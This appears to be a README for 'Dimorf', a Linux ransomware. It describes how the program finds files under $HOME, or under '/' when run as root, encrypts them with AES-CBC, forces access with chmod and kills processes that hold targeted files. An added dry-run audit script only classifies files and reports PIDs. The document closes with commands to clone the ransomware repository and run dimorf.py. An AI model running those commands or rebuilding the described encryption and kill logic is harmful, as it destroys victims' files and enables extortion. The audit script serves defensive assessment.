Dimorf is ransomware for Linux systems that uses 256-bit AES with a randomly generated, self-destructing key.
`__save_log_error`: writes an error entry to a log file when a file selected for encryption cannot be processed because of insufficient permissions, and returns the path of that log file.

`check_os`: checks that the operating system is Linux and that the interpreter is Python 3. If both conditions hold, the encrypt function is called.
`find_and_encrypt`: searches for files under a given path (by default the user's home directory, taken from the `HOME` environment variable) and keeps those whose extension is in `ext_files`. A matching file is skipped if it is hidden (its name begins with "."). For each remaining file the function checks whether the current user has read, write and access permission on it.

If the user has those permissions, the function encrypts the file with AES (Advanced Encryption Standard) in CBC mode: it opens the file in read mode and reads through its entire contents to check whether it is empty, pads the variable `data` with the bytes '\x00\x01' until its length is a multiple of 16 (the AES block size), reopens the file in write mode, encrypts the whole contents, and replaces the original with the encrypted version carrying the ".dimorf" extension.

If the user lacks read, write or access permission, the function tries to change the file's mode to 0o644 (octal: the owner may read and write, everyone else may only read). Note that chmod only succeeds on files the current user owns, or when running as root. If the change succeeds, the encryption process above runs, the encrypted version is written and the original file is removed. Otherwise the function records the file in a log file called "log_dimorf.log", which lists the files whose permissions could not be changed.
Previously the code took the home directory of an ordinary user from the `HOME` environment variable, and it still does so when the current user is an ordinary user. With this update the code also checks the user ID: if the ID is 0, the current user is root, so the traversal starts at the filesystem root "/" instead, since root has permission on its subdirectories. The code then walks every subdirectory under "/", skipping critical directories such as "/boot" and "/etc".

Before starting cryptographic operations on a file, the code also checks whether another process is using that file; if one is, that process is terminated by PID with the `kill` syscall.
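The following dry-run reconstruction of the targeting logic described above is an added example and not Dimorf's own code. It walks the same tree (home directory for an ordinary user, "/" for uid 0 minus excluded directories), classifies each candidate by the action the README describes (encrypt, chmod 0o644 then encrypt, or log), and reports which processes hold a file open by reading `/proc/<pid>/fd`, but it never encrypts, changes permissions or kills anything. The extension list and the full exclusion list are assumptions, since the README only names "/boot" and "/etc". A defender can run it as the affected user to see what a run of this logic could reach.

```python
#!/usr/bin/env python3
"""Dry-run audit of the file-selection logic described above.

Added example, not Dimorf's own code: it walks the same tree, classifies each
candidate by the action the README describes (encrypt / chmod then encrypt / log)
and finds processes holding a file open, but never encrypts, chmods or kills.
"""
import os
from pathlib import Path
from typing import Dict, List, Optional, Set

# Assumed values: the README names neither the contents of ext_files nor the
# full exclusion list (only "/boot", "/etc" and "and so on").
EXT_FILES = {".txt", ".pdf", ".docx", ".xlsx", ".jpg", ".png", ".sql", ".db"}
EXCLUDED_ROOT_DIRS = {"/boot", "/etc", "/proc", "/sys", "/dev", "/usr", "/bin", "/sbin", "/lib"}


def start_path(uid: Optional[int] = None) -> str:
    """uid 0 (root) starts at "/", anyone else at $HOME, as the README describes."""
    uid = os.getuid() if uid is None else uid
    return "/" if uid == 0 else os.environ.get("HOME", os.path.expanduser("~"))


def is_candidate(path: Path, ext_files: Set[str] = EXT_FILES) -> bool:
    """Regular file, targeted extension, and not hidden (name starting with ".")."""
    return path.is_file() and path.suffix.lower() in ext_files and not path.name.startswith(".")


def classify(path: Path) -> str:
    """Predict the README's permission branch without modifying the file.

    "encrypt"        read, write and access permission already held
    "chmod+encrypt"  not held, but chmod 0o644 would succeed (owner or root)
    "log"            chmod would fail, so the original logs it to log_dimorf.log
    """
    if os.access(path, os.R_OK | os.W_OK | os.F_OK):
        return "encrypt"
    # chmod(2) only succeeds for the file's owner or for root; for root,
    # os.access() is already true above, so root never reaches this branch.
    if os.geteuid() == 0 or path.stat().st_uid == os.geteuid():
        return "chmod+encrypt"
    return "log"


def audit(start: str, ext_files: Set[str] = EXT_FILES,
          excluded: Set[str] = EXCLUDED_ROOT_DIRS) -> Dict[str, List[str]]:
    """Walk `start` and bucket every candidate file by the action it would receive."""
    result: Dict[str, List[str]] = {"encrypt": [], "chmod+encrypt": [], "log": []}
    for dirpath, dirnames, filenames in os.walk(start):
        # Prune excluded directories in place so os.walk does not descend into them.
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in excluded]
        for name in filenames:
            p = Path(dirpath, name)
            if is_candidate(p, ext_files):
                result[classify(p)].append(str(p))
    return result


def processes_holding(path: str) -> Set[int]:
    """PIDs that have `path` open, from /proc/<pid>/fd symlinks (Linux only).

    fd directories of other users' processes are unreadable without root, so an
    unprivileged run sees only its own processes. The original kills the holder
    by PID; this function only reports it.
    """
    if not os.path.isdir("/proc"):
        return set()
    target = os.path.realpath(path)
    holders: Set[int] = set()
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            for fd in os.listdir(f"/proc/{entry}/fd"):
                if os.readlink(f"/proc/{entry}/fd/{fd}") == target:
                    holders.add(int(entry))
                    break
        except OSError:  # permission denied, or the process exited mid-scan
            continue
    return holders


if __name__ == "__main__":
    report = audit(start_path())
    for action, files in report.items():
        print(f"{action}: {len(files)} file(s)")
```

Run it as the user whose files you want to assess; the "chmod+encrypt" bucket is the set of files a user-level run could still reach after fixing their mode, and "log" is what would end up in log_dimorf.log.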
```bash
git clone https://github.com/Ort0x36/Dimorf.git
cd Dimorf
pip install -r requirements.txt
chmod +x dimorf.py
./dimorf.py
```